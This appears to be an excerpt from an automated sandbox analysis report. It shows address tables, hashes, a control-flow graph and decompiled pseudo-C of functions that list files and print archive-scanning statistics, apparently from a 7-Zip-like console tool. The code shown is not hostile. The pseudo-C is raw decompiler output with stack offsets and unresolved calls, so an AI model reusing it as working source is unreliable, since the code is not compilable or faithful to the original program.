                                                                                                    0x003f4173
                                                                                                    0x003f4177
                                                                                                    0x003f417c
                                                                                                    0x003f4182
                                                                                                    0x003f4185
                                                                                                    0x003f4188
                                                                                                    0x003f40ef
                                                                                                    0x003f40ef
                                                                                                    0x003f40f2
                                                                                                    0x003f40f8
                                                                                                    0x003f40fb
                                                                                                    0x003f40fd
                                                                                                    0x003f4102
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f418e
                                                                                                    0x003f418e
                                                                                                    0x00000000
                                                                                                    0x003f418e
                                                                                                    0x003f4188
                                                                                                    0x003f4137
                                                                                                    0x003f413a
                                                                                                    0x003f431c
                                                                                                    0x003f4320
                                                                                                    0x00000000
                                                                                                    0x003f4140
                                                                                                    0x00000000
                                                                                                    0x003f4140
                                                                                                    0x003f413a
                                                                                                    0x003f40d8
                                                                                                    0x003f40d8
                                                                                                    0x003f40d8
                                                                                                    0x00000000
                                                                                                    0x003f40d8
                                                                                                    0x003f40d6
                                                                                                    0x003f4007
                                                                                                    0x003f4010
                                                                                                    0x003f4015
                                                                                                    0x003f4017
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f4017
                                                                                                    0x003f3fd1
                                                                                                    0x003f3fd4
                                                                                                    0x003f3fd6
                                                                                                    0x003f3fd9
                                                                                                    0x003f3fdb
                                                                                                    0x003f3fed
                                                                                                    0x003f3fef
                                                                                                    0x003f3fef
                                                                                                    0x003f3ffb
                                                                                                    0x003f3ffb
                                                                                                    0x003f3ffb
                                                                                                    0x003f3ffb
                                                                                                    0x00000000
                                                                                                    0x003f3ffb
                                                                                                    0x003f3ff1
                                                                                                    0x003f3ff3
                                                                                                    0x00000000
                                                                                                    0x003f3ff5
                                                                                                    0x003f3ff5
                                                                                                    0x00000000
                                                                                                    0x003f3ff5
                                                                                                    0x003f3ff3
                                                                                                    0x003f3fdd
                                                                                                    0x003f3fe3
                                                                                                    0x003f3fe3
                                                                                                    0x00000000
                                                                                                    0x003f3fe3
                                                                                                    0x003f3fdf
                                                                                                    0x003f3fe1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f3f64
                                                                                                    0x003f3f64
                                                                                                    0x003f4a9c
                                                                                                    0x003f4a9c
                                                                                                    0x003f4aa3
                                                                                                    0x003f4aa8
                                                                                                    0x003f4aaa
                                                                                                    0x003f4ab0
                                                                                                    0x003f4ab8
                                                                                                    0x003f4ab8

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F3F07
                                                                                                      • Part of subcall function 003FB5D2: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003FB61B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologThrow
                                                                                                    • String ID:
                                                                                                    • API String ID: 461045715-3916222277
                                                                                                    • Opcode ID: 46f0a2f808bc4fbd8961225bcd5625defb19c5f83ea21c5fa3d597d97d556c3a
                                                                                                    • Instruction ID: e9d37622f50cea80dddf0cac73993eb97adddeaf0a02afc0b9f3511c7199bfea
                                                                                                    • Opcode Fuzzy Hash: 46f0a2f808bc4fbd8961225bcd5625defb19c5f83ea21c5fa3d597d97d556c3a
                                                                                                    • Instruction Fuzzy Hash: AA92AD31A00259DFDF16DFA8C844BAEBBB5BF09304F254099E915AB391CB35EE45CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B6553 Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B6553(void* __ebx, void** __ecx, void* __edi, void* __eflags) {
				void* _t22;
				signed int _t25;
				void* _t31;
				void* _t33;
				void** _t48;
				void* _t50;

				E0041F1B0(E00422F18, _t50);
				_t48 = __ecx;
				if(E003B6533(__ecx) == 0) {
					L9:
					_t22 = 0;
				} else {
					_t33 = E003B8717( *(_t50 + 8));
					if(_t33 != 1) {
						_t2 = _t50 - 0x268; // -616
						_t31 = FindFirstFileW( *(_t50 + 8), _t2); // executed
						 *_t48 = _t31;
					}
					if( *_t48 == 0xffffffff && _t33 != 0) {
						_t4 = _t50 - 0x18; // -24
						_t25 = E003B2D47(_t4);
						 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
						_t8 = _t50 - 0x18; // -24
						if(E003B8820( *(_t50 + 8), _t8, _t50, _t25 & 0xffffff00 | _t33 != 0x00000001) != 0) {
							_t11 = _t50 - 0x268; // -616
							_t27 = FindFirstFileW( *(_t50 - 0x18), _t11); // executed
							 *_t48 = _t27;
						}
						 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
						E003B1E40(_t27,  *(_t50 - 0x18));
					}
					if( *_t48 != 0xffffffff) {
						_t17 = _t50 - 0x268; // -616
						E003B6604(_t17,  *((intOrPtr*)(_t50 + 0xc)), __eflags);
						_t22 = 1;
					} else {
						goto L9;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t50 - 0xc));
				return _t22;
			}









                                                                                                    0x003b6558
                                                                                                    0x003b6564
                                                                                                    0x003b656d
                                                                                                    0x003b65e1
                                                                                                    0x003b65e1
                                                                                                    0x003b656f
                                                                                                    0x003b657f
                                                                                                    0x003b6584
                                                                                                    0x003b6586
                                                                                                    0x003b6590
                                                                                                    0x003b6592
                                                                                                    0x003b6592
                                                                                                    0x003b6597
                                                                                                    0x003b659d
                                                                                                    0x003b65a0
                                                                                                    0x003b65a5
                                                                                                    0x003b65af
                                                                                                    0x003b65bd
                                                                                                    0x003b65bf
                                                                                                    0x003b65c9
                                                                                                    0x003b65cb
                                                                                                    0x003b65cb
                                                                                                    0x003b65d0
                                                                                                    0x003b65d4
                                                                                                    0x003b65d9
                                                                                                    0x003b65df
                                                                                                    0x003b65e8
                                                                                                    0x003b65ee
                                                                                                    0x003b65f3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b65df
                                                                                                    0x003b65f9
                                                                                                    0x003b6601

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B6558
                                                                                                      • Part of subcall function 003B6533: FindClose.KERNELBASE(00000000,?,003B656B), ref: 003B653E
                                                                                                    • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 003B6590
                                                                                                    • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 003B65C9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$FileFirst$CloseH_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3371352514-0
                                                                                                    • Opcode ID: 029f1a871bb2ece2a195a087d24b4943429f921373d110d609538f75293055a4
                                                                                                    • Instruction ID: 727ecbe754ff0a2cf9f2767f5e60fbd98e433cf695c9d3c897fa476fe6291137
                                                                                                    • Opcode Fuzzy Hash: 029f1a871bb2ece2a195a087d24b4943429f921373d110d609538f75293055a4
                                                                                                    • Instruction Fuzzy Hash: 8B110832500109DBCF22EF64C8429FDB778EF51328F10432ADA505B5D2CB399D95DB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E9243 Relevance: 58.3, APIs: 15, Strings: 18, Instructions: 503COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 3e9243-3e924a 1 3e924c-3e925b fputs call 3b1fa0 0->1 2 3e9260-3e92f6 call 3e421a call 3b2d47 call 3d0461 call 3b1e40 0->2 1->2 12 3e92f8-3e9300 call 3eb5fa 2->12 13 3e9305-3e9308 2->13 12->13 15 3e930a-3e9311 13->15 16 3e9325-3e9337 call 3eb561 13->16 15->16 18 3e9313-3e9320 call 3e45b8 15->18 21 3e933d-3e935b call 3b1e0c 16->21 22 3e9a22-3e9a31 call 3d0a72 16->22 18->16 30 3e935d-3e9366 call 3e9f16 21->30 31 3e9368 21->31 27 3e9a3a-3e9a41 22->27 28 3e9a35 call 3d0a72 22->28 32 3e9a43-3e9a4a 27->32 33 3e9a51-3e9a7d call 3ea789 call 3b1e40 call 3d1eab 27->33 28->27 36 3e936a-3e9373 30->36 31->36 32->33 37 3e9a4c call 3ea7a4 32->37 53 3e9a7f-3e9a81 33->53 54 3e9a85-3e9acc call 3b1e40 call 3b11c2 call 3eac28 call 3d0a72 33->54 40 3e937b-3e93d8 call 3b2f2f call 3ea093 36->40 41 3e9375-3e9377 36->41 37->33 51 3e93da-3e93de 40->51 52 3e93e4-3e9469 call 3e9b1d call 3ead5a call 3c2625 call 3b2d47 call 3d2fc1 40->52 41->40 51->52 74 3e948d-3e94ed call 3d0d11 52->74 75 3e946b-3e9488 call 3d23c0 call 3ea789 52->75 53->54 81 3e94ef-3e94f4 call 3eb5fa 74->81 82 3e94f9-3e94fc 74->82 75->74 81->82 84 3e94fe-3e9505 82->84 85 3e9545-3e9551 82->85 88 3e9539-3e953c 84->88 89 3e9507-3e9534 call 3b1fa0 fputs call 3b1fa0 call 3b1fb3 call 3b1fa0 84->89 86 3e95b5-3e95c1 85->86 87 3e9553-3e9561 call 3b1fa0 85->87 90 3e95c3-3e95c9 86->90 91 3e95f0-3e95fc 86->91 101 3e956c-3e95b0 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 call 3b1fa0 87->101 102 3e9563-3e956a 87->102 88->85 92 3e953e 88->92 89->88 90->91 95 3e95cb-3e95eb fputs call 3b2201 call 3b1fa0 90->95 97 3e95fe-3e9604 91->97 98 3e962f-3e9631 91->98 92->85 95->91 103 3e960a-3e962a fputs call 3b2201 call 3b1fa0 97->103 104 3e96b0-3e96bc 97->104 98->104 106 3e9633-3e9642 98->106 101->86 102->86 102->101 103->98 110 3e96be-3e96c4 104->110 111 3e9700-3e9704 104->111 113 3e9668-3e9674 106->113 114 3e9644-3e9663 fputs call 3b2201 call 3b1fa0 106->114 118 3e9706 110->118 122 3e96c6-3e96d9 call 3b1fa0 110->122 117 3e970d-3e970f 111->117 111->118 113->104 116 3e9676-3e9689 call 3b1fa0 113->116 114->113 116->104 142 3e968b-3e96ab fputs call 3b2201 call 3b1fa0 116->142 127 3e98c6-3e9902 call 3d302f call 3b1e40 call 3eaf20 call 3e9b99 117->127 128 3e9715-3e9721 117->128 118->117 122->118 141 3e96db-3e96fb fputs call 3b2201 call 3b1fa0 122->141 127->22 182 3e9908-3e990e 127->182 136 3e988a-3e98a0 call 3b1fa0 128->136 137 3e9727-3e9736 128->137 136->127 153 3e98a2-3e98c1 fputs call 3b2201 call 3b1fa0 136->153 137->136 144 3e973c-3e9740 137->144 141->111 142->104 144->127 150 3e9746-3e9754 144->150 157 3e9756-3e977b fputs call 3b2201 call 3b1fa0 150->157 158 3e9781-3e9788 150->158 153->127 157->158 159 3e978a-3e9791 158->159 160 3e97a6-3e97bf fputs call 3b2201 158->160 159->160 166 3e9793-3e9799 159->166 173 3e97c4-3e97d4 call 3b1fa0 160->173 166->160 171 3e979b-3e97a4 166->171 171->160 176 3e981d-3e9862 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 171->176 173->176 184 3e97d6-3e9818 fputs call 3b2201 call 3b1fa0 fputs call 3b2201 call 3b1fa0 173->184 192 3e9867-3e9872 call 3b1fa0 176->192 182->22 184->176 192->127 199 3e9874-3e9888 call 3b1fa0 call 3e5f0e 192->199 199->127
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E003E9243(struct _IO_FILE** __eax, intOrPtr* __ebx, signed int __edi) {
				void* _t252;
				intOrPtr _t253;
				intOrPtr* _t261;
				intOrPtr _t266;
				intOrPtr _t277;
				signed int _t286;
				signed int _t298;
				intOrPtr _t310;
				void* _t326;
				signed int _t332;
				void* _t334;
				struct _IO_FILE** _t339;
				void* _t343;
				struct _IO_FILE** _t392;
				intOrPtr _t405;
				intOrPtr* _t414;
				signed int _t565;
				struct _IO_FILE** _t567;
				signed int _t570;
				struct _IO_FILE** _t571;
				void* _t572;
				intOrPtr _t585;

				_t565 = __edi;
				_t414 = __ebx;
				_t575 =  *((char*)(_t572 - 0x338));
				if( *((char*)(_t572 - 0x338)) != 0) {
					_t571 = __eax;
					fputs("Scanning the drive for archives:",  *__eax); // executed
					E003B1FA0(_t571);
				}
				_t2 = _t572 - 0x44c; // 0x42e058
				 *(_t572 - 0xac) = _t565;
				 *(_t572 - 0xa8) = _t565;
				 *(_t572 - 0xa4) = _t565;
				 *(_t572 - 0xa0) = _t565;
				 *(_t572 - 0x9c) = _t565;
				 *(_t572 - 0x98) = _t565;
				 *(_t572 - 0x94) = _t565;
				 *(_t572 - 0x90) = _t565;
				 *(_t572 - 0x8c) = _t565;
				 *(_t572 - 0x88) = _t565;
				 *(_t572 - 0x84) = _t565;
				 *(_t572 - 0x80) = _t565;
				E003E421A(_t2);
				_t252 = E003B2D47(_t572 - 0x60);
				_t16 = _t572 - 0x44c; // 0x42e058
				_push(_t572 - 0xac);
				_push(_t572 - 0x38);
				_push(_t572 - 0x78);
				_push(_t252);
				 *(_t572 - 4) = 0xe;
				_t253 = E003D0461(_t414, _t572 - 0x2cc, 0, _t565, _t575); // executed
				 *((intOrPtr*)(_t572 - 0x20)) = _t253;
				 *(_t572 - 4) = 0xd;
				E003B1E40(_t253,  *((intOrPtr*)(_t572 - 0x60)));
				if( *((intOrPtr*)(_t572 - 0x398)) != _t565) {
					E003EB5FA(_t572 - 0x43c, _t565, 1); // executed
				}
				if( *((intOrPtr*)(_t572 - 0x20)) == _t565 &&  *((char*)(_t572 - 0x338)) != 0) {
					_push(_t572 - 0xac); // executed
					E003E45B8(_t572 - 0x44c); // executed
				}
				 *(_t572 - 4) = 0xc;
				E003EB561(_t572 - 0x43c);
				if( *((intOrPtr*)(_t572 - 0x20)) != _t565) {
					L74:
					 *(_t572 - 4) = 0xb;
					E003D0A72(_t414, _t572 - 0x38);
					 *(_t572 - 4) = 8;
					E003D0A72(_t414, _t572 - 0x78);
					if( *((char*)(_t572 - 0x334)) != 0 &&  *0x43a894 != 0) {
						E003EA7A4();
					}
					E003B1E40(E003EA789( *((intOrPtr*)(_t572 - 0x20))),  *((intOrPtr*)(_t572 - 0xcc)));
					 *(_t572 - 4) = 6;
					L003D1EAB(_t572 - 0xc0);
					_t261 =  *((intOrPtr*)(_t572 - 0x2c));
					 *(_t572 - 4) = 4;
					_t621 = _t261;
					if(_t261 != 0) {
						_t261 =  *((intOrPtr*)( *_t261 + 8))(_t261);
					}
					 *(_t572 - 4) = 2;
					E003B1E40(_t261,  *((intOrPtr*)(_t572 - 0xdc)));
					E003B11C2(_t572 - 0x108);
					 *(_t572 - 4) =  *(_t572 - 4) & 0x00000000;
					E003EAC28(_t414, _t572 - 0x340, _t621);
					 *(_t572 - 4) =  *(_t572 - 4) | 0xffffffff;
					E003D0A72(_t414, _t572 - 0x6c);
					_t266 =  *((intOrPtr*)(_t572 - 0x28));
					 *[fs:0x0] =  *((intOrPtr*)(_t572 - 0xc));
					return _t266;
				}
				if( *(_t572 - 0xd) == 0) {
					_push(_t572 - 0x5c);
					_push(_t572 - 0x50);
					_push(_t572 - 0x2a4);
					 *(_t572 - 0x24) =  *((intOrPtr*)(_t572 - 0x308));
					_push(_t572 - 0x2e4);
					 *((char*)(_t572 - 0x23)) =  *((intOrPtr*)(_t572 - 0x307));
					_push(_t572 - 0x2e8);
					 *(_t572 - 0x50) = _t565;
					_push( *((intOrPtr*)(_t572 - 0x335)));
					 *(_t572 - 0x4c) = _t565;
					 *(_t572 - 0x5c) = _t565;
					 *(_t572 - 0x58) = _t565;
					_push( *((intOrPtr*)(_t572 - 0x338)));
					_push( *((intOrPtr*)( *((intOrPtr*)(_t572 - 0x314)))) + 0xc);
					_push( *((intOrPtr*)(_t572 - 0x331)));
					_push( *((intOrPtr*)(_t572 - 0x270)));
					_push(_t572 - 0x38);
					_push(_t572 - 0x78);
					_push( *((intOrPtr*)(_t572 - 0x33a)));
					_push(_t572 - 0xcc);
					_push(_t572 - 0xc0);
					_t277 = L003E74FD(_t572 - 0x24,  *((intOrPtr*)(_t572 - 0x2c)), __eflags);
					__eflags =  *((char*)(_t572 - 0x338));
					 *((intOrPtr*)(_t572 - 0x20)) = _t277;
					if( *((char*)(_t572 - 0x338)) == 0) {
						L69:
						__eflags =  *(_t572 - 0x4c) - _t565;
						if( *(_t572 - 0x4c) > _t565) {
							L71:
							__eflags =  *((char*)(_t572 - 0x338));
							if( *((char*)(_t572 - 0x338)) != 0) {
								E003B1FA0(0x43a5b0);
								 *_t414("Errors: ",  *0x43a5b0);
								E003B1FA0(E003B2201(0x43a5b0,  *(_t572 - 0x50),  *(_t572 - 0x4c)));
							}
							 *((intOrPtr*)(_t572 - 0x28)) = 2;
							goto L74;
						}
						__eflags =  *(_t572 - 0x50) - _t565;
						if( *(_t572 - 0x50) <= _t565) {
							goto L74;
						}
						goto L71;
					}
					__eflags =  *(_t572 - 0x58) - _t565;
					if( *(_t572 - 0x58) > _t565) {
						L68:
						E003B1FA0(0x43a5b0);
						 *_t414("Warnings: ",  *0x43a5b0);
						E003B1FA0(E003B2201(0x43a5b0,  *(_t572 - 0x5c),  *(_t572 - 0x58)));
						goto L69;
					}
					__eflags =  *(_t572 - 0x5c) - _t565;
					if( *(_t572 - 0x5c) <= _t565) {
						goto L69;
					}
					goto L68;
				} else {
					_push(0x170);
					_t286 = E003B1E0C();
					 *(_t572 - 0x58) = _t286;
					_t581 = _t286 - _t565;
					 *(_t572 - 4) = 0xf;
					if(_t286 == _t565) {
						_t570 = 0;
						__eflags = 0;
					} else {
						_t570 = L003E9F16(_t286, _t581);
					}
					 *(_t572 - 4) = 0xc;
					 *(_t572 - 0x58) = _t570;
					if(_t570 != _t565) {
						 *((intOrPtr*)( *_t570 + 4))(_t570);
					}
					_t41 = _t570 + 0xdc; // 0xdc
					 *((char*)(_t570 + 0xda)) =  *((intOrPtr*)(_t572 - 0x2e8));
					 *(_t572 - 4) = 0x10;
					E003B2F2F(_t41, _t572 - 0x2e4);
					 *((char*)(_t570 + 0xd9)) = E003EA093(_t570,  *0x43a894,  *0x43a898,  *((intOrPtr*)(_t572 - 0x18))) & 0xffffff00 |  *((intOrPtr*)(_t572 - 0x74)) - 0x00000001 > 0x00000000;
					 *((intOrPtr*)(_t570 + 0x168)) =  *((intOrPtr*)(_t572 - 0x114));
					 *(_t570 + 0x164) =  *(_t572 - 0x1c);
					if( *((intOrPtr*)(_t572 - 0x18)) != _t565) {
						_t405 =  *(_t572 - 0x14) - 1;
						_t585 = _t405;
						 *((intOrPtr*)(_t570 + 0xc4)) = _t405;
					}
					L003E9B1D(_t572 - 0x38c, _t585);
					_push(_t572 - 0x298);
					 *(_t572 - 4) = 0x11;
					E003EAD5A(_t572 - 0x38c);
					 *((char*)(_t572 - 0x350)) =  *((intOrPtr*)(_t572 - 0x33a));
					_t298 =  *((intOrPtr*)(_t572 - 0x337));
					 *(_t572 - 0x34e) = _t298;
					 *(_t572 - 0x34f) = _t298;
					 *((char*)(_t572 - 0x34d)) = _t298 & 0xffffff00 |  *((intOrPtr*)(_t572 - 0x2f8)) == 0x00000003;
					E003C2625(_t572 - 0x34c, _t572 - 0x2a4);
					E003B2D47(_t572 - 0x54);
					 *(_t572 - 4) = 0x12;
					E003D2FC1(_t572 - 0x3ec);
					 *(_t572 - 4) = 0x13;
					 *(_t572 - 0x1c) = _t565;
					if( *((intOrPtr*)(_t572 - 0x2d4)) != _t565) {
						 *(_t572 - 0x1c) = _t572 - 0x3ec;
						_push(_t572 - 0x2d8);
						E003EA789(E003D23C0(_t572 - 0x3ec));
					}
					_push(_t572 - 0xb4);
					_push(_t572 - 0x54);
					_push( *(_t572 - 0x1c));
					_t86 = _t570 + 4; // 0x4
					asm("sbb ecx, ecx");
					_push(_t570);
					_push( ~_t570 & _t86);
					asm("sbb edx, edx");
					_t87 = _t570 + 0x10; // 0x10
					_push( ~_t570 & _t87);
					_push(_t572 - 0x38c);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t572 - 0x314)))) + 0xc);
					_push(_t572 - 0x38);
					_push(_t572 - 0x78);
					_push(_t572 - 0xcc);
					_t310 = E003D0D11( *((intOrPtr*)(_t572 - 0x2c)), _t572 - 0xc0); // executed
					 *((intOrPtr*)(_t572 - 0x20)) = _t310;
					if( *((intOrPtr*)(_t570 + 0xbc)) != _t565) {
						_t96 = _t570 + 0x18; // 0x18
						E003EB5FA(_t96, _t565, 1);
					}
					if( *(_t572 - 0x50) != _t565) {
						_t392 =  *0x43a898; // 0x43a5a0
						_t590 = _t392 - _t565;
						if(_t392 != _t565) {
							 *(_t572 - 0x14) = _t392;
							E003B1FA0(_t392);
							fputs("ERROR:",  *( *(_t572 - 0x14)));
							E003B1FA0( *(_t572 - 0x14));
							_push( *((intOrPtr*)(_t572 - 0x54)));
							E003B1FA0(L003B1FB3( *(_t572 - 0x14), _t590));
						}
						if( *((intOrPtr*)(_t572 - 0x20)) == _t565) {
							 *((intOrPtr*)(_t572 - 0x20)) = 0x80004005;
						}
					}
					_t567 =  *0x43a894; // 0x43a5b0
					 *(_t572 - 0xd) =  *(_t572 - 0xd) & 0x00000000;
					if(_t567 != 0) {
						E003B1FA0(_t567);
						if( *((intOrPtr*)(_t570 + 0x114)) > 0 ||  *((intOrPtr*)(_t570 + 0x110)) > 1) {
							fputs("Archives: ",  *_t567);
							_t109 = _t570 + 0x110; // 0x110
							E003B1FA0(E003B2201(_t567,  *_t109,  *((intOrPtr*)(_t109 + 4))));
							fputs("OK archives: ",  *_t567);
							E003B1FA0(E003B2201(_t567,  *((intOrPtr*)(_t570 + 0x120)),  *((intOrPtr*)(_t570 + 0x124))));
						}
					}
					if(( *(_t570 + 0x128) |  *(_t570 + 0x12c)) != 0) {
						 *(_t572 - 0xd) = 1;
						if(_t567 != 0) {
							fputs("Can\'t open as archive: ",  *_t567);
							E003B1FA0(E003B2201(_t567,  *(_t570 + 0x128),  *(_t570 + 0x12c)));
						}
					}
					if(( *(_t570 + 0x130) |  *(_t570 + 0x134)) == 0) {
						L35:
						if(_t567 != 0) {
							_t124 = _t570 + 0x138; // 0x138
							if(( *(_t570 + 0x138) |  *(_t124 + 4)) != 0) {
								fputs("Archives with Warnings: ",  *_t567);
								_t126 = _t570 + 0x138; // 0x138
								E003B1FA0(E003B2201(_t567,  *_t126,  *((intOrPtr*)(_t126 + 4))));
							}
							if(( *(_t570 + 0x148) |  *(_t570 + 0x14c)) != 0) {
								E003B1FA0(_t567);
								if(( *(_t570 + 0x148) |  *(_t570 + 0x14c)) != 0) {
									fputs("Warnings: ",  *_t567);
									E003B1FA0(E003B2201(_t567,  *(_t570 + 0x148),  *(_t570 + 0x14c)));
								}
							}
						}
						goto L41;
					} else {
						 *(_t572 - 0xd) = 1;
						if(_t567 == 0) {
							L41:
							if(( *(_t570 + 0x140) |  *(_t570 + 0x144)) == 0) {
								L45:
								if( *(_t572 - 0xd) == 0) {
									L47:
									if(_t567 == 0) {
										L63:
										 *(_t572 - 4) = 0x12;
										E003B1E40(E003D302F(_t572 - 0x3ec),  *((intOrPtr*)(_t572 - 0x54)));
										 *(_t572 - 4) = 0x14;
										E003EAF20(_t572 - 0x34c);
										 *(_t572 - 4) = 0x10;
										L003E9B99(_t572 - 0x38c);
										 *(_t572 - 4) = 0xc;
										if(_t570 != 0) {
											 *((intOrPtr*)( *_t570 + 8))(_t570);
										}
										goto L74;
									}
									if(( *(_t570 + 0x130) |  *(_t570 + 0x134)) != 0) {
										L61:
										E003B1FA0(_t567);
										_t177 = _t570 + 0x150; // 0x150
										_t326 = _t177;
										__eflags =  *(_t570 + 0x150) |  *(_t326 + 4);
										if(( *(_t570 + 0x150) |  *(_t326 + 4)) != 0) {
											fputs("Sub items Errors: ",  *_t567);
											_t179 = _t570 + 0x150; // 0x150
											E003B1FA0(E003B2201(_t567,  *_t179,  *((intOrPtr*)(_t179 + 4))));
										}
										goto L63;
									}
									_t146 = _t570 + 0x150; // 0x150
									if(( *(_t570 + 0x150) |  *(_t146 + 4)) != 0) {
										goto L61;
									}
									if( *((intOrPtr*)(_t572 - 0x20)) == 0) {
										_t332 =  *(_t572 - 0x94);
										if((_t332 |  *(_t572 - 0x90)) != 0) {
											fputs("Folders: ",  *_t567);
											E003B1FA0(E003B2201(_t567,  *(_t572 - 0x94),  *(_t572 - 0x90)));
											_t332 =  *(_t572 - 0x94);
										}
										if( *(_t572 - 0x8c) != 1 ||  *(_t572 - 0x88) != 0 || (_t332 |  *(_t572 - 0x90)) != 0 || ( *(_t572 - 0x84) |  *(_t572 - 0x80)) != 0) {
											fputs("Files: ",  *_t567); // executed
											_t334 = E003B2201(_t567,  *(_t572 - 0x8c),  *(_t572 - 0x88)); // executed
											E003B1FA0(_t334);
											if(( *(_t572 - 0x84) |  *(_t572 - 0x80)) != 0) {
												fputs("Alternate Streams: ",  *_t567);
												E003B1FA0(E003B2201(_t567,  *(_t572 - 0x84),  *(_t572 - 0x80)));
												fputs("Alternate Streams Size: ",  *_t567);
												E003B1FA0(E003B2201(_t567,  *(_t572 - 0xa4),  *(_t572 - 0xa0)));
											}
										}
										fputs("Size:       ",  *_t567); // executed
										_t339 = E003B2201(_t567,  *(_t572 - 0xac),  *(_t572 - 0xa8)); // executed
										 *(_t572 - 0x24) = _t339;
										E003B1FA0(_t339);
										fputs("Compressed: ",  *( *(_t572 - 0x24))); // executed
										_t343 = E003B2201( *(_t572 - 0x24),  *(_t572 - 0x9c),  *(_t572 - 0x98)); // executed
										E003B1FA0(_t343);
										if( *(_t572 - 0x1c) != 0) {
											E003B1FA0(_t567);
											L003E5F0E(_t567, _t572 - 0x3ec);
										}
									}
									goto L63;
								}
								L46:
								 *((intOrPtr*)(_t572 - 0x28)) = 2;
								goto L47;
							}
							 *(_t572 - 0xd) = 1;
							if(_t567 == 0) {
								goto L46;
							}
							E003B1FA0(_t567);
							if(( *(_t570 + 0x140) |  *(_t570 + 0x144)) == 0) {
								goto L46;
							}
							fputs("Open Errors: ",  *_t567);
							E003B1FA0(E003B2201(_t567,  *(_t570 + 0x140),  *(_t570 + 0x144)));
							goto L45;
						}
						fputs("Archives with Errors: ",  *_t567);
						E003B1FA0(E003B2201(_t567,  *(_t570 + 0x130),  *(_t570 + 0x134)));
						goto L35;
					}
				}
			}

























                                                                                                    0x003e9243
                                                                                                    0x003e9243
                                                                                                    0x003e9243
                                                                                                    0x003e924a
                                                                                                    0x003e924c
                                                                                                    0x003e9255
                                                                                                    0x003e925b
                                                                                                    0x003e925b
                                                                                                    0x003e9260
                                                                                                    0x003e9266
                                                                                                    0x003e926c
                                                                                                    0x003e9272
                                                                                                    0x003e9278
                                                                                                    0x003e927e
                                                                                                    0x003e9284
                                                                                                    0x003e928a
                                                                                                    0x003e9290
                                                                                                    0x003e9296
                                                                                                    0x003e929c
                                                                                                    0x003e92a2
                                                                                                    0x003e92a8
                                                                                                    0x003e92ab
                                                                                                    0x003e92b3
                                                                                                    0x003e92b8
                                                                                                    0x003e92c7
                                                                                                    0x003e92cb
                                                                                                    0x003e92cf
                                                                                                    0x003e92d0
                                                                                                    0x003e92d7
                                                                                                    0x003e92db
                                                                                                    0x003e92e0
                                                                                                    0x003e92e3
                                                                                                    0x003e92ea
                                                                                                    0x003e92f6
                                                                                                    0x003e9300
                                                                                                    0x003e9300
                                                                                                    0x003e9308
                                                                                                    0x003e931f
                                                                                                    0x003e9320
                                                                                                    0x003e9320
                                                                                                    0x003e932b
                                                                                                    0x003e932f
                                                                                                    0x003e9337
                                                                                                    0x003e9a22
                                                                                                    0x003e9a25
                                                                                                    0x003e9a29
                                                                                                    0x003e9a31
                                                                                                    0x003e9a35
                                                                                                    0x003e9a41
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a4c
                                                                                                    0x003e9a5f
                                                                                                    0x003e9a65
                                                                                                    0x003e9a6f
                                                                                                    0x003e9a74
                                                                                                    0x003e9a77
                                                                                                    0x003e9a7b
                                                                                                    0x003e9a7d
                                                                                                    0x003e9a82
                                                                                                    0x003e9a82
                                                                                                    0x003e9a8b
                                                                                                    0x003e9a8f
                                                                                                    0x003e9a9b
                                                                                                    0x003e9aa0
